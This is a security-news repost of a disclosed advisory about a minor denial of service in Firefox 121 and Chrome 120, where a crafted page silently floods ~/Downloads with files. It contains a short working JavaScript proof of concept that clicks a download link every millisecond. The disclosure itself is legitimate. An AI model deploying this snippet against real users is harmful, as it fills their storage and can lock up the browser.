Security
Headlines
HeadlinesLatestCVEs

Headline

Firefox 121 / Chrome 120 Denial Of Service

Firefox version 121 and Chrome version 120 may both suffer from a minor denial of service issue with file downloads.

Packet Storm
#google#linux#dos#chrome#firefox
Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)Tested on: firefox 121 and chrome 120 on GNU/linuxDate: Thu Jan 18 08:38:28 AM UTC 2024This is barely a DoS, but since it might affect Chrome too we decidedto disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA especially ona phone.The code basically is:<pre>URL = "data:text/plain;,a";//can be very large with no net trafficlink = document.createElement('a');link.href = URL;link.download = 'joro_';document.body.appendChild(link);function f() {if( !confirm("This will ruin your device with probability up to 199.99%"))    return;setInterval("link.click();",1);//dobro}f();</pre>There is no network traffic and in about 90 seconds firefox 121 created3434 files at speed about 38 files/second.google chrome 120 prompts about multiple downloads, and if the userallows it, it creates files at speed of 4.2 files/second, butit gives modal prompts, which we couldn't close from the GUI andhad to kill the process.[Test online][1]: if you are vulnerable[1]: https://j.ludost.net/download2.html-- guninski

Packet Storm: Latest News

Red Hat Security Advisory 2024-8690-03